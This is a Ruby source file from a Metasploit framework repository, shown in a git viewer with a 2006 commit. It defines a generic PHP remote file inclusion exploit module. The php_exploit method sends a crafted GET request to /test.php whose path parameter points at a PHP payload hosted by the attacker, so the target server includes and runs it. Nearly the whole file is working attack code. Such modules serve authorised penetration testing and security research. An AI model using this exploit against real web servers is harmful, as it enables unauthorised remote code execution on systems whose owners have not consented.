Files
metasploit-gs/modules/exploits/multi/webapp/php_include.rb
T
HD Moore ffc626675b Initial support for PHP payloads
git-svn-id: file:///home/svn/framework3/trunk@4215 4d416f70-5f16-0410-b530-b9f4589650da
2006-12-17 07:57:51 +00:00

45 lines
930 B
Ruby

require 'msf/core'
module Msf
class Exploits::Multi::Webapp::PHP_INCLUDE < Msf::Exploit::Remote
include Exploit::Remote::Tcp
include Exploit::Remote::HttpServer::PHPInclude
def initialize(info = {})
super(update_info(info,
'Name' => 'PHP Include Generic Exploit',
'Description' => %q{
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 3509 $',
'References' =>
[
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Space' => 32768,
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [[ 'Automatic', { }]],
'DefaultTarget' => 0))
end
def php_exploit
connect
req = "GET /test.php?path=#{Rex::Text.uri_encode(php_include_url)} HTTP/1.0\r\n\r\n"
print_status("Sending: #{req}")
sock.put(req)
disconnect
end
end
end